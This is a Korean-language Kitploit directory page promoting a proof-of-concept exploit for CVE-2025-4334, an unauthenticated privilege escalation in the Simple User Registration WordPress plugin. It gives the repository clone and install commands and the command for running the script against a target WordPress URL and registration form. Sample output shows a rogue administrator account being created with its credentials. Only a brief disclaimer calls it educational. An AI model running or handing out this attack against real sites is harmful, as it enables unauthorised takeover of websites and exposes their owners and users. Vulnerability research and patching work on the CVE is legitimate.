Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-4334 — Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts. | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.

저장소 보기
410개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

워드프레스 로고

CVE-2025-4334 - Simple User Registration <= 6.3 인증되지 않은 권한 상승

익스플로잇 제목: Simple User Registration <= 6.3 – 인증되지 않은 권한 상승
작성자: Gaurav Bhattacharjee (0xgh057r3c0n)
CVE ID: CVE-2025-4334

이 익스플로잇은 **WordPress용 Simple User Registration 플러그인(<= v6.3)**의 취약점을 대상으로 하며, 인증되지 않은 공격자가 권한을 상승시키고 새로운 관리자 계정을 생성할 수 있도록 합니다.


⚙️ 설치

리포지토리를 복제하고 필요한 Python 종속성을 설치합니다:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

종속성:

  • requests
  • colorama

🚀 사용법

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

인수:

  • -u / --url → 기본 WordPress URL (예: https://target.com/wordpress/)
  • --form → 등록 양식의 전체 URL (예: https://target.com/wpr/default-registration/)

예시:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 샘플 출력

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ 면책 조항

이 도구는 교육 및 연구 목적으로만 제공됩니다.
허가 없이 시스템을 대상으로 한 무단 사용은 불법입니다.
저자는 오용에 대해 책임을 지지 않습니다.


📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.

도구 다운로드